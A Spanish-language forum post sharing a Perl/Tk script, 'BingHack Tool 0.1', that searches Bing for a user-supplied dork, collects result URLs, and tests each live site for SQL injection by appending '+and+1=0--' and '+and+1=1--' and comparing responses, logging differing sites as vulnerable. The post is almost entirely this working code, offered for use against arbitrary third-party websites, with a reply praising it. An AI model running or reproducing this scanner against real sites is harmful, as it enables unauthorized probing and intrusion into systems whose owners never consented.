Versión Tk de un script en Perl para buscar páginas vulnerables a SQLi usando Bing.
Una imagen
(http://doddyhackman.webcindario.com/images/bing.jpg)
El código
#!usr/bin/perl
#BingHack Tool 0.1
#Version Tk
#Coded By Doddy H
use Tk;
use LWP::UserAgent;
# Shared HTTP client used for every request the script makes (search pages
# and probed URLs alike).  The User-Agent is one fixed string; note that it
# has no space between "Gecko/20080201" and "Firefox", so traffic from this
# script can be recognised in web server logs by that exact value.
# Each request is given 5 seconds before LWP gives up.
my $nave = LWP::UserAgent->new(
    agent =>
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
    timeout => 5,
);
# Colour scheme shared by every widget created below.
my $color_fondo = "black";
my $color_texto = "green";
# On Windows, Win32::Console::Free() detaches the process from its console so
# only the Tk window remains.
# NOTE(review): `use` is processed at compile time, so Win32::Console is
# loaded regardless of this runtime test; on a system without that module the
# script would presumably fail to compile -- confirm.
if ( $^O eq 'MSWin32' ) {
use Win32::Console;
Win32::Console::Free();
}
# Main window: fixed 600x285 geometry, not resizable.
my $hj =
MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$hj->geometry("600x285+20+20");
$hj->resizable( 0, 0 );
$hj->title("BingHack Tool 0.1");
# "Dork" input: the search query later passed to bing() as its first argument.
$hj->Label(
-text => "Dork : ",
-font => "Impact1",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 18, -y => 22 );
my $dork = $hj->Entry(
-width => 30,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 68, -y => 26 );
# "Pages" input: passed to bing() as its second argument.  $pages is a
# file-level lexical, so the subs defined further down see this same variable.
$hj->Label(
-text => "Pages : ",
-font => "Impact1",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 270, -y => 22 );
my $pages = $hj->Entry(
-width => 10,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 335, -y => 26 );
# "Search" runs search(); "Logs" runs logs().
$hj->Button(
-text => "Search",
-width => 10,
-background => $color_fondo,
-foreground => $color_texto,
-activebackground => $color_texto,
-command => \&search
)->place( -x => 420, -y => 26 );
$hj->Button(
-text => "Logs",
-width => 10,
-background => $color_fondo,
-foreground => $color_texto,
-activebackground => $color_texto,
-command => \&logs
)->place( -x => 495, -y => 26 );
# Left listbox ($links): every URL returned by bing().
$hj->Label(
-text => "Links Found",
-font => "Impact",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 110, -y => 80 );
my $links = $hj->Listbox(
-width => 40,
-height => 10,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 30, -y => 120 );
# Right listbox ($founds): URLs for which sql() saw two differing responses.
$hj->Label(
-text => "SQLi Found",
-font => "Impact",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 390, -y => 80 );
my $founds = $hj->Listbox(
-width => 40,
-height => 10,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 310, -y => 120 );
# Enter the Tk event loop.  The named subs below are compiled before this
# line runs, so the button callbacks can refer to them.
MainLoop;
# Callback for the "Search" button.
# Empties both result listboxes, asks bing() for URLs using the current
# contents of the Dork and Pages entries, lists every URL in $links, then
# passes each URL to sql().  The window title doubles as a status line and
# is restored to the plain tool name at the end.
sub search {
    foreach my $lista ( $links, $founds ) {
        $lista->delete( "0.0", "end" );
    }
    $hj->update;
    $hj->title("BingHack Tool 0.1 [+] Status : Searching");

    my @urls = bing( $dork->get, $pages->get );
    $hj->update;

    # Show each collected URL, refreshing the GUI before every insert.
    foreach my $url (@urls) {
        $hj->update;
        $links->insert( "end", $url );
    }

    $hj->title("BingHack Tool 0.1 [+] Status : Scanning");

    # Probe the URLs one at a time; sql() records any it flags.
    foreach my $url (@urls) {
        $hj->update;
        sql($url);
    }

    $hj->update;
    $hj->title("BingHack Tool 0.1");
}
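# Callback for the "Logs" button.
# When sql-logs.txt exists as a plain file it is handed to system();
# otherwise an error dialog is shown.
sub logs {
    my $file = "sql-logs.txt";
    if ( -f $file ) {

        # NOTE(review): system() runs the file NAME as a command.  The name
        # is relative, so what gets run depends on how the platform resolves
        # it, and the file's contents are URLs taken from third-party search
        # results.  Opening the file with an explicit viewer would be safer.
        system($file);
    }
    else {

        # The dialog uses the same colour scheme as the rest of the GUI.
        # (The original referred to an undeclared $color_text here, which
        # left both colour options undefined.)
        $hj->Dialog(
            -title            => "Error",
            -buttons          => ["OK"],
            -text             => "Logs not found",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -activebackground => $color_texto
        )->Show();
    }
}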
# Probe one URL for a response that depends on an appended boolean condition.
# Fetches $page twice through toma(): once with "+and+1=0--" appended and once
# with "+and+1=1--".  The two response bodies are compared as strings; when
# they differ, the URL is inserted into the $founds listbox and appended to
# sql-logs.txt via savefile().
#
# NOTE(review): the comparison is exact string equality on whole bodies, so
# any difference between the two fetches counts as a hit.  A page whose output
# varies from request to request would presumably be reported as well, so the
# listed URLs are unverified candidates, not confirmed findings.
#
# Seen from the target's access log, each tested URL yields two GET requests
# whose query strings end in the two suffixes above, both sent with the fixed
# User-Agent configured on $nave.  Applications that bind parameters instead
# of concatenating them into SQL treat the appended text as data.
sub sql {
# $pass1 is the word separator ("+"), $pass2 the trailing comment marker.
my ( $pass1, $pass2 ) = ( "+", "--" );
my $page = shift;
my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
unless ( $testar1 eq $testar2 ) {
$founds->insert( "end", $page );
savefile( "sql-logs.txt", $page );
}
}
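# Append one line to a file.
#   $_[0]  path of the file to append to (created if missing)
#   $_[1]  text to write; a newline is added
# Returns true on success.  On failure a warning is emitted and a false value
# is returned, so a write error no longer passes silently.
#
# The three-argument open() keeps the mode separate from the path, so the
# path is used literally (no whitespace trimming or mode characters read
# from it), and the lexical handle avoids sharing a global SAVE handle.
sub savefile {
    my ( $path, $line ) = @_;

    my $fh;
    unless ( open( $fh, '>>', $path ) ) {
        warn "savefile: cannot open '$path' for append: $!\n";
        return;
    }

    my $written = print {$fh} $line . "\n";

    # Buffered write errors only surface at close, so check both.
    unless ( close($fh) && $written ) {
        warn "savefile: write to '$path' failed: $!\n";
        return;
    }
    return 1;
}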
# Collect result links from Bing for a query.
#   $a  the query text (the Dork entry's contents when called from search())
#   $b  upper bound for the "first" result offset
# For offsets 10, 20, ... up to $b, fetches
# http://www.bing.com/search?q=<query>&first=<offset> through toma() and
# captures the href of every `<h3><a href="...">` in the returned markup.
# The collected links are passed through cortar() and then repes(), and that
# list is returned.
#
# NOTE(review): $a and $b are declared with `my` here; they share their names
# with the special variables used by sort().
sub bing {
my ( $a, $b ) = @_;
# NOTE(review): $pages is not declared in this sub, so this is the file-level
# lexical that holds the Pages Entry widget.  The loop overwrites it with a
# number, so a later `$pages->get` in search() no longer has a widget to call.
for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
$hj->update;
my $code =
toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
# Extraction relies on this exact markup; if the page is structured
# differently, presumably nothing is captured.
while ( $code =~ /<h3><a href="(.*?)"/mig ) {
# No `my @founds` is in scope yet, so this pushes onto the package array
# @founds, which is never emptied and therefore grows across calls.
push( @founds, $1 );
}
}
# The right-hand side still reads the package array; the new lexical @founds
# only exists from the next statement on.
my @founds = repes( cortar(@founds) );
return @founds;
}
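# Remove duplicates from a list, keeping the first occurrence of each value
# and the original order.
# Returns the de-duplicated list.
#
# The "seen" table is local to each call.  The original kept it in the
# package hash %repe, which was never cleared, so a value seen in one call
# was silently dropped from every later call.
sub repes {
    my %visto;
    my @limpio;
    for my $valor (@_) {
        push @limpio, $valor unless $visto{$valor}++;
    }
    return @limpio;
}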
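# Truncate each string just after its first "=".
# A string containing "=" is cut so that it ends with that first "=";
# a string without "=" is passed through unchanged.
# Returns the resulting list in the same order as the input.
#
# Uses only lexical variables; the original stored the split result in the
# package array @tengo and read it with the one-element slice @tengo[0].
sub cortar {
    my @nuevo;
    for my $texto (@_) {
        my $pos = index( $texto, '=' );
        push @nuevo, $pos >= 0 ? substr( $texto, 0, $pos + 1 ) : $texto;
    }
    return @nuevo;
}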
# Fetch a URL with the shared $nave client and return the response body.
# The response status is not inspected; whatever content() yields is
# returned as is.
sub toma {
    my $respuesta = $nave->get( $_[0] );
    return $respuesta->content;
}
#The End ?
Muy bueno Doddy ;D